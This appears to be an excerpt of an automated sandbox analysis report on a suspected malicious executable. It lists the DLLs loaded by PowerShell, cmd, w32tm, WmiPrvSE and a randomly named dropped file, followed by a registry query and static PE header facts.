Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: mscoree.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: apphelp.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: kernel.appcore.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: version.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: uxtheme.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: windows.storage.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: wldp.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: profapi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: cryptsp.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: rsaenh.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: cryptbase.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: sspicli.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: ktmw32.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: wbemcomn.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: amsi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: userenv.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: iphlpapi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: dnsapi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: dhcpcsvc6.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: dhcpcsvc.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: winnsi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: rasapi32.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: rasman.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: rtutils.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: mswsock.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: winhttp.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: rasadhlp.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: fwpuclnt.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: winmm.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: winmmbase.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: mmdevapi.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: devobj.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: ksuser.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: avrt.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: audioses.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: powrprof.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: umpdc.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: msacm32.dll
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Section loaded: midimap.dll

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ccp3sJPDXs.exe

Static file information: File size 16971446 > 1048576

Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ccp3sJPDXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
